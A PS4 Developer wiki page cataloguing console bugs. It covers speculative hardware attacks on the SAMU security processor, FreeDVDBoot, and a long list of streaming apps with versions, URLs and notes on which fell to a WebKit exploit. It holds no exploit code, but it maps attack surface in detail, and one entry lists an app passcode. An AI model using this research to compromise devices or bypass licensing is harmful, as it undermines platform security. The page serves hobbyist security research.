Bugs

From PS4 Developer wiki

The PS4 has bugs. Some bugs can lead to Vulnerabilities. Others lead to nothing useful (yet) but can serve as examples of what not to do.

Theoretical Hardware Attacks

We already know for certain someone out there has hacked the SAMU or stolen Sony's keys because of leaked decrypted kernels. These are some end-all hardware solutions to hack the PS4, theorized by golden. I give a score out of 10 for each.

Power analysis against SAMU 9.9/10

There are theories that this won't work because...

  • SAMU silicon spoofs hamming weight (prevents differential power analysis and EM analysis)
  • It is running too fast and not feasible since cost is too high
  • You cannot slow down the SAMU clock since it is internally checked
  • Some more issues?

If there is some sort of main CPU/SAMU PLL bypass we might be able to slow the clock down really easily, otherwise we must inject our own clock signal. I believe the SAMU clock is controlled by syscon? If the check is in syscon then we can just patch it out. Maybe write a custom Linux fork that never loads into usermode but just sits and constantly decrypts different self/sprx files. We could communicate with this Linux fork over UART. This attack only needs to work once to recover some keys.

SAMU power/clock glitch fault injection 5/10

During an AES round we might be able to do some SCA by injecting faults. See the paper from umass.edu in the section below. We would write a minimal operating system to reboot into after exploiting an older firmware. This 'operating system' will simply shutdown most of the CPU cores and pin one core. This code would communicate with the SAMU and do everything the normal SCE SAMU driver does for decryption. We can then use UART output from CPU to time our glitch attacks. The faulty data retrieved by our custom SAMU driver might be able to reveal secret key data. This attack only needs to work once to recover some keys.

SAMU backside UV/IR fault injection 3/10

Just as the title states. Very expensive to set up and do properly. If we can flip an even number of bits in the encrypted SAMU SRAM region of the chip (even, because of the ECC parity bit), then some sort of side channel analysis might be able to be done to recover key material. Some silicon reverse engineering would be involved to find the SRAM region on the die.

"Moreover, it is no longer possible to hit a single SRAM cell with the current etching technologies, since the width of the gate dielectric is now more than 10 times smaller than the shortest wavelength of visible light." To get an idea of the cost of this equipment... "A class of threats which cannot be ignored if the attackers have access to a larger budget (above the aforementioned $3000 and up to millions of dollars)" (http://euler.ecs.umass.edu/research/bbkn-IEEEP-2012.pdf)

The fault injection is all infeasible unless some elite hackzor comes out of the woodwork. We only need to have this work once.

SEM/FIB/microprobes 2/10

We might be able to readout the bootrom with some microprobes? Sniff data lines somewhere? The SAMU SRAM memory is encrypted so we would have to probe the LM32 instruction bus or something... infeasible but possible.

USB

The FreeBSD USB stack has been theorized, by a well-known security researcher, to contain some high profile bugs. A dongle might just be possible. For example, last year someone ran a fuzzer on the Linux USB stack and found some crazy bugs: https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md

Bluetooth

There are probably some bugs in the Sony/FreeBSD Bluetooth stack. Sony has a habit of ruining their own copy and paste. One of the reasons fail0verflow decided to attack the DS4 controller firmware was because it had a nice interface to the kernel which could contain bugs.

Look at Blueborne and CVE-2017-0781.

Usermode (DVD player)

Exploiting the DVD player on PS4 is probably impractical on later System Software versions (since around 1.70) because of usermode ASLR, so exploiting the Blu-ray Disc player through BD-Java is easier.

FreeDVDBoot

Launching a DVD containing the FreeDVDBoot PS2 exploit crashes the PS4 with error CE-36329-3 so the PS4 might be vulnerable to the exact same bug as the PS2. The PS3 is also affected.

On PS4, there is IFO parsing in the SceShellCore, BdmvPlayerCore and BdvdPlayerCore (NPXS20113) executables. They seem to load the entire IFO into memory, then parse out its contents. The code seems more or less identical between the executables.

See SceShellCore, BdmvPlayerCore and BdvdPlayerCore (NPXS20113) from PS4 <= 7.51.

See also PS2 wiki and PS3 wiki.

Patched

Maybe since PS4 7.55.

Usermode (network in games and applications)

YouTube

See also PS5 wiki.

YouTube:

  • EP4381-CUSA01116_00-YOUTUBESCEE00000
  • UP4381-CUSA01015_00-YOUTUBESCEA00000
  • JA0004-CUSA01065_00-YOUTUBESCEJ00000
  • HP4381-CUSA01034_00-YOUTUBESCEH00000

YouTube Beta:

  • UP4381-CUSA06021_00-YOUTUBESCEA0BETA

YouTube TV:

  • UP4381-CUSA18680_00-YOUTUBETVSCEA000

Unclassified:

  • CUSA15375

1.00: Requires PSN connection.

Netflix

See also PS5 wiki.

  • UT0007-CUSA00129_00-NETFLIXPOLLUX001 (US, CAN)
  • EP4350-CUSA00127_00-NETFLIXPOLLUX001 (Denmark, Finland, Ireland, Netherlands, Norway, Sweden, UK)
  • JA0010-CUSA02988_00-NETFLIXPOLLUX001 (JP)

Beta:

  • EP4350-CUSA01160_00-NETFLIXPS4BETA00
  • CUSA01149

WebKit exploit in some PS4 applications (codename WeebSploit)

Note: This section will be partially moved to the Vulnerabilities page after being split from all PS4 applications that are not exploitable via WebKit, and improved.

WeebSploit is the codename given by CelesteBlue to WebKit exploits affecting some applications on PS Vita and PS4.

Credits

  • WebKit exploiters of the PS Vita scene, notably Chris Wade (cmwdotme), Davee, Proxima, xyz, Yifan Lu, TheFloW
  • WebKit exploiters of the PS3 scene, notably xerpi, zecoxao, esc0rtd3w
  • WebKit exploiters of the PS4 scene, notably Proxima, nas, Fire30, qwertyoruiop, Quentin Meffre, Mehdi Talbi, sleirsgoevy, abc
  • m0rph3us1987 for the initial discovery and public disclosure in 2018
  • CelesteBlue for the 2019 private research and public disclosure in 2026, SocraticBliss and dots-tb for the name "weebsploit"
  • earthonion, Gezine and all people behind the YouTube and Netflix exploits on PS5
  • earthonion and all people behind the PlayStation Vue exploit on PS4

History

This section mostly comes from CelesteBlue's private research on hacking PS4 applications in July 2019, following m0rph3us1987's write-up presented publicly at Chaos West 2018 on 2018-12-18.

The idea of getting usermode code execution on the PS4 via third-party applications that use the WebKit engine to execute JavaScript can be traced back as early as October 26, 2014 [1], when Yifan Lu, the famous PS Vita hacker, suggested it. There have also been many investigations by esc0rtd3w into exploiting the PS3 media applications, but their JavaScript engine was rarely WebKit, and for making PS3HEN the PS3Xploit Team ended up using the PS3 internet browser with a vulnerability ported by xerpi from the oldest PS Vita internet browser. After the WebKit vulnerability used in the HENkaku exploit chain got patched in PS Vita System Software 3.61, and before a new WebKit vulnerability, ported from qwertyoruiop's PS4 internet browser exploit by TheFloW, was released for the PS Vita with the henlo exploit chain, CelesteBlue investigated WebKit exploits in PS Vita and PS4 applications. The PS4 and the PS Vita have many media applications in common. One of them is the DMM.com application, released on 2013.11.14 on PS Vita (https://store.playstation.com/ja-jp/product/JA0003-PCSC80021_00-DMM0000000000000) and on 2015.10.01 on PS4 (https://store.playstation.com/ja-jp/product/JA0012-CUSA03302_00-DMMCOMPS40000000). The first PS4 applications revealed to be vulnerable to WebKit exploits were IGN and Vevo, by m0rph3us1987, when the latest PS4 System Software version was 3.15. m0rph3us1987 also mentioned YouTube, Netflix and Amazon Prime Video, but these applications were either not using WebKit or not as easy or convenient to exploit. Months later, CelesteBlue found Red Bull TV, GameONE, Gamereactor and DMM.com easier to exploit on the PS4, while on the PS Vita he also had some success with GameONE and a few other DRM-free applications.

CelesteBlue did not publicly release information before January 2026, when the PlayStation Vue exploit for PS4 was released. His main reason for keeping it secret was that WebKit exploits in PS4 applications were not convenient for a release: the applications had to be downloaded from the PS Store to get a license file and the PS4 had to be activated while on the latest System Software version, and the exploits could easily be patched via application updates, PS4 System Software updates or a delisting of the applications from the PS Store. WebKit exploits in the PS4 internet browser had far fewer drawbacks; however, as of January 2026, there is no exploit for the internet browser on PS4 versions from 10.00 to the latest, nor on PS5 5.00 and more recent. On PS3 and PS Vita, the internet browser can be hacked even on the latest System Software version. In 2025, it was discovered that the YouTube and Netflix applications on the PS5 could run without a license file, and it was rediscovered that the same was true for the PlayStation Vue application on the PS4. This peculiarity makes PlayStation Vue the most convenient PS4 application for exploitation. On PS5, the Videos and TV applications have required a license to run since System Software 12.60, and the same could happen to PlayStation Vue on the PS4 in future PS4 System Software updates.

PS4 applications vulnerable to WebKit exploits

Using WebKit and pwned (crash of the application using a WebKit vulnerability):

IGN
EP4436-CUSA00268_00-WEBMAF0000000IGN (UK)
1.00 (FW 1.06, signin, no SSL, pwned with JSArray::sortCompactedVector), 1.02 (FW 3.00, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, no ASLR
HP4436-CUSA00420_00-WEBMAF0000000IGN
UP2109-CUSA00238_00-WEBMAF0000000IGN (CAN, RSA, MEX, US)
1.00 (no SSL, pwned with JSArray::sortCompactedVector, offline), 1.31 (FW 3.55, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://www.ign.com/apps/playstation/
http://www.ign.com/apps/playstation4/v1.3/ (to come: v1.4, v1.5)
As of 2022, the service is no longer available.
Uses WebMAF on PS3 and PS4.

GameONE
EP4455-CUSA00294_00-GAMEONEAPPPS4000 (FR)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.02 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no ASLR
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/index.html
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/scripts/sdk.js
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/scripts/app/app.js
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/dojoroot/app/pages/webMaf/index.html
http://gameone-catchup.wiztivi.com/gameonecatchup-backend/configuration?nbProgram=2
Uses WebMAF on PS3 and PS Vita.

Gamereactor
EP4545-CUSA01710_00-WEB00GAMEREACTOR (AUS, DEN, ESP, FIN, GER, IRE, ITA, NZ, NOR, POR, SA, SWE, UK)
1.00 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, ASLR
http://www.gamereactor.dk/apps/ps4/
Uses WebMAF on PS4.

beIN Sports
EP4520-CUSA01258_00-WEBMAF000000BEIN (AU BH BE BG HR CY CZ DK DE ES FI FR GB GR HU IS IN IE IL IT KW LB LU MT NL NZ NO AT OM PL PT QA RO RU SA CH SE SK SI TR UA AE ZA)
CUSA05351
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01-?1.03? (FW 2.50, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://tvapps.beinsports.net/bein.html
Uses WebMAF on PS4.

beIN Connect
CUSA08612
EP8840-CUSA08722_00-BEINCONNECTSPAIN 

FilmoTV
EP4453-CUSA00279_00-WEBMAF000FILMOTV (FR)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.03 (FW 3.00, redir), 2.00 (FW 6.02), 2.01 (FW 6.51)
Mozilla/5.0 (PlayStation 4 WebMAF) AppleWebKit/538.8 (KHTML, like Gecko) WebMAF/v2.1.0-0-g5586764 SDK: (0x06008051u), Built: Feb  4 2019 15:08:55
Uses WebMAF on PS3 and PS4.

MUBI
EP4164-CUSA01196_00-WEBMAF000000MUBI
UP4164-CUSA01500_00-MUBISCEASUBMTI00
CUSA03459
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01 (FW 3.00, not vulnerable)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS3 and PS4.

7plus
EP4447-CUSA01287_00-WEBMAF00000PLUS7 (AU, NZ, ?)
CUSA35181
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.03 (not vulnerable)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://plus7.apps.accedo.tv
Uses WebMAF on PS3 and PS4.

ABC iview
EP4443-CUSA01626_00-ABC0IVIEW0000000 (AUS)
1.00 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://tv.iview.abc.net.au/playstation.php
Uses WebMAF on PS3.

Foxtel Now (formerly Foxtel Play)
EP4480-CUSA00518_00-FOXTELPLAYAPP000 (AUS)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01 (not vulnerable)
http://foxtel-go-sw.foxtelplayer.foxtel.com.au/playstation/client/PlayStation4.php
http://foxtel-go-sw.foxtelplayer.foxtel.com.au/playstation/client/securejs.php
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
https://www.stevenbai.net/sonyps/
https://en.wikipedia.org/wiki/Foxtel_Now

Presto
EP4480-CUSA03793_00-WEBMAF0000PRESTO
Uses WebMAF on PS3 and PS4. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Presto_(streaming_company)

BINGE
EP8850-CUSA31644_00-3897431192515463
Uses WebMAF. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Robi_(company)#Binge

Kayo Sports
EP8850-CUSA18595_00-SM0KS00000000001
Uses WebMAF. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Kayo_Sports

DMM.com
JA0012-CUSA03302_00-DMMCOMPS40000000 (JP)
1.00 (redirected http://ps4.dmm.co.jp, no SSL, pwned with JSArray::sortCompactedVector), 4.06 (SSL, redirection possible but maybe no JS hijack)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
DOES NOT REQUIRE PSN CONNECTION BUT REQUIRES A LICENSE

Untested PS4 applications

See also:

Using WebKit but not pwned:

OCS
EP8000-CUSA01916_00-WEBMAF0000000OCS
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
not vulnerable
Uses WebMAF on PS3 and PS4.

VEVO
EP4547-CUSA01692_00-WEBMAF000000VEVO (ESP, FRA, GER, IRL, ITA, NLD, NZ, POL, UK, US)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, no ASLR?
Uses WebMAF on PS3 and PS4.

Claro Video
UP8833-CUSA07829_00-WEBMAF000DEFAULT
CUSA04859
CUSA04945
CUSA05019
BR
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://playstation4.clarovideo.net/FRONTEND/
Uses WebMAF on PS4.

SFR Sport
EP8845-CUSA11455_00-SFRSPORT00000000
1.00 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0

RMC SPORT
EP8845-CUSA14066_00-WEBMAF000DEFAULT
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS4.

Dailymotion
EP4515-CUSA01161_00-00000DAILYMOTION
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0

Red Bull TV
CUSA09246
UP8904-CUSA03460_00-REDBULLTVAPP2015
EP8842-CUSA09418_00-REDBULLTVEUROPS4
JA0019-CUSA08391_00-REDBULLTVAPPASIA
HP8918-CUSA09119_00-REDBULLTVASIAPS4
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
1.00: Does not require PSN connection. Redirection impossible.
1.10: Does not require PSN connection. Redirection possible.
http://ps4.redbull.tv/
Uses WebMAF on PS3.

Yupp TV
UP2088-CUSA00097_00-YUPPTVXXXXTEST00 (US)
EP8810-CUSA03244_00-WEBMAF0000YUPPTV
1.00 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://www.yupptv.com/ps4/
Uses WebMAF on PS3 and PS4.

Stan
EP8814-CUSA03580_00-WEBMAF000000STAN (Australia)
1.00 (redir), 1.08 (not vulnerable)
http://playstationapp.stan.com.au
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS3 and PS4.
Stan (stylised as Stan.) is an Australian subscription over-the-top streaming television service.

Probably WebMAF-based applications, probably using WebKit:

Okko Movies HD (Okko Фильмы HD)
EP8818-CUSA03794_00-WEBMAF000000OKKO
Uses WebMAF on PS4.

du View
EP4551-CUSA02063_00-WEBMAF0000DUVIEW
Uses WebMAF on PS3 and PS4.

DRTV
EP8807-CUSA02676_00-WEBMAF000000DRTV
Uses WebMAF on PS3 and PS4.

FILMIN
EP8824-CUSA05126_00-WEBMAF0000FILMIN
Uses WebMAF on PS3 and PS4.

DRAMAFEVER
UP8903-CUSA03400_00-DRAMAFEVER000100
Uses WebMAF on PS3 and likely on PS4.

Min Bio
EP8811-CUSA03207_00-WEBMAF0000MINBIO
Uses WebMAF on PS3 and PS4.

Grada1 TV
EP8836-CUSA07838_00-WEBMAF01GRADA1TV
Uses WebMAF on PS4.

Dansk Filmskat
EP8811-CUSA03206_00-000DANSKFILMSKAT
Uses WebMAF on PS3 and likely on PS4.
Uses WebKit on PS4.
Passcode: 2GHPo-QlC60u2fknmepZ2W7K5fPPK_eC.

Lightbox
EP4548-CUSA01693_00-WEBMAF00LIGHTBOX (NZ)
Uses WebMAF on PS3 and PS4 (?, 1.66, 2.4.0, 3.1.0, 3.2.0).
On 7 July 2020, Sky merged Lightbox into its own streaming service Neon using the existing streaming platform of Lightbox.
Neon must not be mistaken with Neon Alley (CAN, US), that was discontinued and moved to Hulu Plus.

Sky Ticket / WOW
EP8809-CUSA03107_00-WEBMAFSKYONLINED
CUSA37378
Uses WebMAF on PS3 and PS4.

Sky CH
EP8809-CUSA13816_00-0000000000000000

Fan Pass
EP8832-CUSA06710_00-SKYNETWRKFANPASS
Formerly named Sky Sport Now.

Pathé Thuis
EP4466-CUSA01312_00-WEBMAF00000PATHE (Netherlands)
Uses WebMAF on PS3 and PS4.

Redbox
UP7410-CUSA30257_00-WEBMAF0000REDBOX
Uses WebMAF on PS4.

Redbox Instant
UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI (US)
Patch 2.00 requires PS4 1.70 but even lower for base package.
Redbox Instant is a movie streaming service by Verizon.
https://www.youtube.com/watch?v=IniAu5Sm6xY
base JSON still available:
http://gs2.ww.prod.dl.playstation.net/gs2/appkgo/prod/CUSA00145_00/3/f_6867c54020304b0e838dd036f78fd5ebb2411d42a3f3a866f307b9b822427dc5/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI.json
base PKG, dead or restricted link:
http://gs2.ww.prod.dl.playstation.net/gs2/appkgo/prod/CUSA00145_00/3/f_6867c54020304b0e838dd036f78fd5ebb2411d42a3f3a866f307b9b822427dc5/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI.pkg
update JSON still available:
http://gs2.ww.prod.dl.playstation.net/gs2/ppkgo/prod/CUSA00145_00/1/f_dfa9e1e7c3834035a9cf46aced074f8e25dc560046bca079acf6424ac9d859f0/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI-A0200-V0100.json
update PKG still available:
http://gs2.ww.prod.dl.playstation.net/gs2/ppkgo/prod/CUSA00145_00/1/f_dfa9e1e7c3834035a9cf46aced074f8e25dc560046bca079acf6424ac9d859f0/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI-A0200-V0100.pkg

PLAYER
EP4343-CUSA00358_00-WEBMAF0000000TVN
Publisher: TVN Media
Uses WebMAF on PS4.

Tennis TV
EP8834-CUSA07415_00-WEBMAF00TENNISTV
UP8847-CUSA15736_00-WEBMAF00TENNISTV
1.00: Requires PSN connection.
Uses WebMAF on PS4.

Plex
UP4544-CUSA01850_00-PLEX000000000000
EP4544-CUSA01703_00-WEBMAF000000PLEX
Uses WebMAF on PS3 and PS4.
not vulnerable
https://forums.plex.tv/t/platform-update-for-ps4/146051
https://forums.plex.tv/t/new-playstation-4-app-preview/633771/38
https://forums.plex.tv/t/plex-for-playstation-4/328364/118
https://forums.plex.tv/t/has-plex-for-ps4-been-discontinued-there-is-no-access-to-it/851293

Animelab
EP8812-CUSA03389_00-WEBMAF00ANIMELAB (Australia, NZ)
1.00 (not vulnerable), 1.01 (not vulnerable)
Uses WebMAF on PS3 and PS4.

9Now
EP8831-CUSA06299_00-WEBMAF0000009NOW
1.00
Uses WebMAF on PS4.

Now TV
EP4391-CUSA00117_00-NOWTVFULLPS40000
EP4391-CUSA07306_00-NOWTVFULLPS40000
EP4439-CUSA00278_00-WEBMAF0SKYITALIA
EP4391-CUSA12336_00-NOW0TV0ITALY0NEW
CUSA26585
Uses WebMAF on PS3 and PS4 (<2.2, 2.2, 2.7.0, 3.1.1, 3.1.3).

NowTV Beta
EP4391-CUSA10420_00-NOWTVROIBETA0000
EP4391-CUSA00519_00-SKYNOWTVBETA0000
Uses libjscore on PS3.

Now TV Beta
EP4391-CUSA01935_00-WEBMAF00000NOWTV
Uses WebMAF on PS4.

TV From Sky
EP4391-CUSA01245_00-SKYGOFULLPS40000

TV from Sky (Beta)
EP4391-CUSA01246_00-SKYGOBETAPS40000

TV from Sky Trial
EP4391-CUSA14603_00-WEBMAF000DEFAULT

Sky
EP4391-CUSA11488_00-AWCDXYZH123NOPQR
Uses WebMAF on PS3.

Sky X
EP4391-CUSA15009_00-SKYX2019SKYX2019

Sky X Beta
EP4391-CUSA18405_00-SKYXBETASKYXBETA

Sky Q
EP4391-CUSA17187_00-SKYQ2019SKYQ2019

Sky Q Beta
EP4391-CUSA27986_00-SKYQBETASKYQBETA

WeatherNation
UP2170-CUSA03976_00-WEATHERNATION015
Uses WebMAF on PS Vita and PS4.

Animax
EP4398-CUSA01115_00-WEBMAF0000ANIMAX
JA0009-CUSA02181_00-WEBMAFANIMAXPLUS
Uses WebMAF on PS3, PS Vita and PS4.

MEO VideoClube
EP4428-CUSA00280_00-WEBMAF00000MEOGO
Uses WebMAF on PS4.

Blockbuster
EP4543-CUSA01669_00-WEBMAF000BBUSTER
Uses WebMAF on PS3 and PS4.

ivi
EP8847-CUSA15025_00-SONYPLAYSTATION4

Dplay
CUSA16193

Walmart Video
CUSA16202

ICFLIX
EP4532-CUSA01462_00-WEBMAF0000ICFLIX
Uses WebMAF on PS3 and PS4.

TV 2 Sumo
EP4458-CUSA00334_00-WEBMAF000TV2SUMO
CUSA00780
Uses WebMAF on PS3 and PS4.

Movistar+
EP4512-CUSA01142_00-WEBMAF00000YOMVI
Uses WebMAF on PS3 and PS4.

fuso
EP4475-CUSA00517_00-WEBMAF000000FUSO
Uses WebMAF on PS3 and PS4.

TVIGLE
EP4434-CUSA00604_00-WEBMAF0000TVIGLE
Uses WebMAF on PS3 and PS4.

TVNZ OnDemand
EP4444-CUSA02578_00-WEBMAF000000TVNZ (NZ)
Uses WebMAF on PS3 and PS4.

NRK Super
EP4509-CUSA01144_00-WEBMAF00NRKSUPER
Uses WebMAF on PS3 and PS4.

NRK TV
EP4509-CUSA01145_00-WEBMAF00000NRKTV
Uses WebMAF on PS3 and PS4.

TV3
EP4516-CUSA01346_00-WEBMAF0000000TV3
Uses WebMAF on PS3 and PS4.

Filmbox Live
EP4438-CUSA00281_00-WEBMAF000FILMBOX (BGR, CZE, GRC, HRV, HUN, POL, ROM, SVN, TUR)
Uses WebMAF on PS3 and PS4.

Multiplayer.it
EP4462-CUSA00454_00-WEBMAF00000MULTI
Uses WebMAF on PS Vita and PS4.

Clan Rtve.es
EP4490-CUSA00797_00-WEBMAF0000CLANTV
Uses WebMAF on PS3 and PS4.

SKAI
EP4465-CUSA00449_00-WEBMAF000000SKAI
Uses WebMAF on PS4.

Plush
EP4534-CUSA01468_00-WEBMAF00000PLUSH
Uses WebMAF on PS4.

RTBF
EP4400-CUSA00121_00-RTBF0000WEBMAF00 (Belgium)
Uses WebMAF on PS4.

RTBF Auvio
EP4400-CUSA44299_00-0092760140209966

Mediaset Infinity
EP4463-CUSA41147_00-0867350236276218
Uses WebMAF on PS3 and PS Vita.

Infinity
EP4463-CUSA00376_00-MEDIASETINFINITY
Uses WebMAF on PS3 and PS Vita.

Blinkbox
CUSA01226 (UK)
Uses WebMAF on PS3.

Videoland
EP4549-CUSA01763_00-WEB0000VIDEOLAND (Netherlands)
Uses WebMAF on PS3 and PS4.

Videoland V2
EP4549-CUSA32490_00-2297157498601021 (Netherlands)

iHeartRadio
UP2207-CUSA01896_00-IHEARTRADIOAPP15
Uses WebMAF on PS3.

YLE Areena
EP4446-CUSA03061_00-WEBMAF0YLEAREENA (Finland)
CUSA44434
Uses WebMAF on PS3 and PS4.

Film1
EP8820-CUSA04481_00-WEBMAF00PS4FILM1
Uses WebMAF on PS4.

MegoGo
EP8839-CUSA08290_00-WEBMAF0000MEGOGO
EP8849-CUSA17005_00-WEBMAF00RUMEGOGO
https://megogo.net/ru

NLZIET
EP8821-CUSA04506_00-WEBMAFNLZIET0000
Uses WebMAF on PS4.

STARZ PLAY
EP8827-CUSA05439_00-WEBMAF0STARZPLAY
Uses WebMAF on PS4 (1.66).

Magine TV - Live Fernsehen
EP8829-CUSA06035_00-WEBMAF000MAGINET
Uses WebMAF on PS4.

NEON NZ
EP8832-CUSA06709_00-WEBMAF0PS4NEONNZ
Uses WebMAF on PS4.

HBO
EP8806-CUSA02827_00-WEBMAF0HBONORDIC
CUSA31343
Uses WebMAF on PS3 and PS4.

HBO Portugal
EP8841-CUSA14922_00-HBOPORTUGAL00000

HBO NOW
UP2084-CUSA05223_00-HBONOWPS40000000
CUSA05211
CUSA05212
CUSA05213
CUSA05215
CUSA05219
Uses WebMAF on PS3 and probably on PS4.

HBO GO
UP2084-CUSA01567_00-HBOGOFORPS4USA00 (US)
EP8841-CUSA04053_00-WEBMAF00000HBOGO
Uses WebMAF on PS3 and PS4.

HBO Max
EP8806-CUSA46979_00-0046040646500964
EP8806-CUSA31344_00-3378412633960324
CUSA31016
CUSA31280
Uses WebMAF on PS3 and probably on PS4.

SHOWMAX / Showmax RC
EB0841-CUSA47296_00-0107588159045802
EB0841-CUSA47321_00-0795391597505094
CUSA47661
CUSA47662
CUSA47663
EP8823-CUSA04891_00-WEBMAFSHOWMAX000
Uses WebMAF on PS4.

Anghami
EP8843-CUSA09723_00-WEBMAF000ANGHAMI
Uses WebMAF on PS4.

NOS
EP4442-CUSA00120_00-NOSSPORTSAPPPS40 (Netherlands)
EP4442-CUSA02993_00-WEBMAF0000000NOS
EP8848-CUSA16977_00-WEBMAF00000NOSTV
Uses WebMAF on PS3 and PS4.

Unknown JavaScript engine or no JavaScript engine:

Ximon
EP4401-CUSA00118_00-XIMONFULLAPP0000 (Belgium, Netherlands)

Jook Video
CUSA00295

PLAYER UTILITY
CUSA00300

WWE Network
UT0025-CUSA00429_00-WWE0000000000001 (ARG, BRA, CHL, COL, MEX, PER, US, AUS)
EP4505-CUSA01092_00-WWE0000000000001 (BEL, BGR, HRV, CZE, DNK, FIN, GBR, GRC, HUN, IRL, ISR, LUX, NLD, NZ, NOR, POL, PRT, RUS, SWE, SVN, TUR, ZAF)
HT0025-CUSA00882_00-WWE0000000000001
CUSA12199
CUSA37377
User-Agent: "PS4Application libhttp/1.000 (PS4) libhttp/X (PlayStation 4)" where X is replaced by PS4 System Software version for e.g. 6.51, 12.00
1.00: Does not require PSN connection. Not vulnerable to JS redirection but JSON redirection possible.
WWE stands for World Wrestling Entertainment.

Quickflix
EP4342-CUSA00247_00-QUICKFLIX0000FUL (AUS, NZ)
https://en.wikipedia.org/wiki/Quickflix
Uses WebMAF on PS3.

Demand5
EP4346-CUSA00248_00-CHANNEL50DEMAND5 (UK)
Uses WebMAF on PS3.

Popcornflix
UP2202-CUSA01851_00-POPCORNFLIX30875 (US)
https://en.wikipedia.org/wiki/Popcornflix

Amazon Prime Video
UP2064-CUSA00130_00-AIV00000000000US (US, CAN)
EP4183-CUSA00126_00-AIV00000000000EU (GER, UK)
JA0011-CUSA03099_00-AMAZONVIDEOJAPAN (JP)
JA0011-CUSA03099_00-ASIA000000000000
CUSA01808
1.00: "Update application to use network features."
1.01+: not vulnerable via JS but maybe via other file types.
Another name is Amazon Instant Video.

Prime Video Beta
UP2064-CUSA17943_00-PRIMEVIDEOBETANA
EP4183-CUSA17942_00-PRIMEVIDEOBETAEU

Freevee / IMDb TV
EP4183-CUSA42682_00-0077912076671617
CUSA43239
Freevee is a video streaming application by Amazon. It was shut down.

IMDb TV
UP2064-CUSA25926_00-0338501424743609
CUSA26048
IMDb TV was published by Amazon.

Molly Beta
UP2064-CUSA02877_00-AIVUSBETA0000PS4
EP4183-CUSA01888_00-AMAZONIVBETA00EU
JA0011-CUSA03413_00-AMAZONVIDEOBETA0
Molly Beta was published by Amazon.

Rakuten TV
EP4410-CUSA00123_00-WUAKI0FULL000000
JA0016-CUSA11244_00-RAKUTENTV0000001 (JP)
CUSA07145
1.00: Requires PSN connection.
Uses WebMAF on PS3.
In 2010, the service was launched in Spain under the name Wuaki.tv, and later expanded to Andorra. By 2013, it had entered the markets in Britain, as well as Italy, France, and Germany later that same year. In June 2012, e-commerce company Rakuten acquired the company, previously known as Wuaki.tv. In July 2017, Wuaki.tv changed its name to Rakuten TV.

Viaplay
EP4345-CUSA00124_00-VIAPLAYFULLAPP00 (Denmark, Finland, Norway, Sweden)
CUSA47836
Uses WebMAF on PS3.

Viaplay Beta
EP4345-CUSA01579_00-VIAPLAYBETAAPP00
Uses WebMAF on PS3.

iQIYI
HP8350-CUSA47998_00-0453390761649026
HP8350-CUSA47998_00-IQIYIWEBMAWEBAPP
